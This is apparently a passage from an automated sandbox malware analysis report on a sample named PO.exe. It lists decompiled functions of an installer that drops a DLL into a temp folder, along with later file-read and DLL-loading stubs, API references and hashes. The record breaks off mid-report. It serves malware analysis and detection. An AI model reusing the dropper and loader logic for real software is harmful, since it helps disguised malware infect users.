Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}

0x004021fc
0x00402200
0x00402208
0x0040220e
0x00402211
0x0040221e
0x0040222f
0x00402233
0x0040223a
0x00402243
0x0040224b
0x0040224e
0x00402251
0x00402255
0x00402266
0x0040226f
0x004026da
0x004026da
0x00402932
0x0040293e

APIs

lstrlenA.KERNEL32 ref: 00402218
lstrlenA.KERNEL32(00000000), ref: 00402222
lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A

Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E

SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
String ID:
API String ID: 3674637002-0
Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x00405568
0x0040556f
0x00405572
0x00405577
0x0040558a
0x004055a4
0x00000000
0x004055a4
0x0040558e
0x0040558f
0x00405592
0x00405593
0x0040559b
0x00000000
0x00000000
0x0040559d
0x004055a0
0x00000000
0x00000000
0x00000000
0x004055a0
0x00000000
0x00405580
0x00000000
0x00405581

APIs

CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040556D
CharNextA.USER32(00000000), ref: 00405572
CharNextA.USER32(00000000), ref: 00405581

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3213498283-823278215
Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d9c
0x00401db5
0x00401dbf
0x00401dc4
0x00401dcf
0x00401dd6
0x00401de8
0x00401dee
0x00401df3
0x00401dfd
0x00402536
0x00401581
0x004028d7
0x00402932
0x0040293e

APIs

GetDC.USER32(?), ref: 00401D95
GetDeviceCaps.GDI32(00000000), ref: 00401D9C
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E

Uniqueness

Uniqueness Score: -1.00%

Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}

0x00404cad
0x00404cca
0x00404cce
0x00404cd0
0x00404cd0
0x00404cd0
0x00404cd7
0x00404ce3
0x00404d03
0x00000000
0x00404ce5
0x00404ce8
0x00404cee
0x00404cf0
0x00404d43
0x00404d43
0x00404d46
0x00000000
0x00404d56
0x00404cfc
0x00404cfe
0x00404d06
0x00404d06
0x00404d09
0x00404d0b
0x00404d11
0x00404d20
0x00404d26
0x00404d2d
0x00404d34
0x00404d3b
0x00404d40
0x00404d11
0x00000000
0x00404d09
0x00404ce3
0x00404cb3
0x00404cbe
0x00000000
0x00404cc3
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404CE8
CallWindowProcA.USER32 ref: 00404D56

Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05

Strings

, xrefs: 00404CAF

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x0040253c
0x0040253c
0x0040253f
0x0040255a
0x00402541
0x00402543
0x00402548
0x0040254f
0x00402561
0x004026da
0x004026da
0x00402567
0x00402579
0x004015c8
0x004015ca
0x00000000
0x004015d0
0x004015ca
0x00402932
0x0040293e

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,00000000,?,?,00000000,00000011), ref: 00402579

Strings

C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll, xrefs: 00402548, 0040256D

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll
API String ID: 427699356-2779864617
Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}

0x00405514
0x0040551e
0x00405520
0x00405527
0x0040552f
0x00000000
0x00000000
0x00000000
0x0040552f
0x00405531
0x00405535

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527

Strings

C:\Users\user\Desktop, xrefs: 00405513

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405630
0x00405632
0x0040565a
0x0040563f
0x00405644
0x0040564f
0x00000000
0x0040566c
0x00405658
0x00405658
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PO.exe PID: 5536 Parent PID: 5584 PO.exeCOMMON

Executed Functions

Function 00419F82, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

HA, xrefs: 00419FAC, 00419FB8
BMA, xrefs: 0041A01D, 0041A024
BMA, xrefs: 0041A002, 0041A010

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA$HA
API String ID: 2738559852-181183267
Opcode ID: ee005e7d53b4009636e69a13ab7c7980dc937df443edbf7508cf3bdc91f605ec
Instruction ID: ce9809e5136a1fbff831e16473afbd499a3884393c6d359958bccecdfc15b652
Opcode Fuzzy Hash: ee005e7d53b4009636e69a13ab7c7980dc937df443edbf7508cf3bdc91f605ec
Instruction Fuzzy Hash: 41211AB2200108ABCB14DF99CC90EEB77ADAF8C724F158349FA1D97291D634E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419FDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A01D, 0041A024
BMA, xrefs: 0041A002, 0041A010

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: a516921730e8b4e823e568445b66df88af10a7cb6d2f9e45d861a25f5b63ddb8
Instruction ID: ed8df86ed1946459c06f0c162de9eff727f1fb3360dfcbbb8b5eac30e107891b
Opcode Fuzzy Hash: a516921730e8b4e823e568445b66df88af10a7cb6d2f9e45d861a25f5b63ddb8
Instruction Fuzzy Hash: B5012D72200104AFCB14DF99DC95EEB77A9EF8C364F158659FA1D97241D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t3 = _t13 + 0xc48; // 0xc48
				_t29 = _t3;
				E0041AB30(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}

0x00419fe3
0x00419fef
0x00419fef
0x00419ff7
0x0041a002
0x0041a01d
0x0041a025
0x0041a029

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A01D, 0041A024
BMA, xrefs: 0041A002, 0041A010

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041C820( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC40(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEC0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041B070(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2B, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

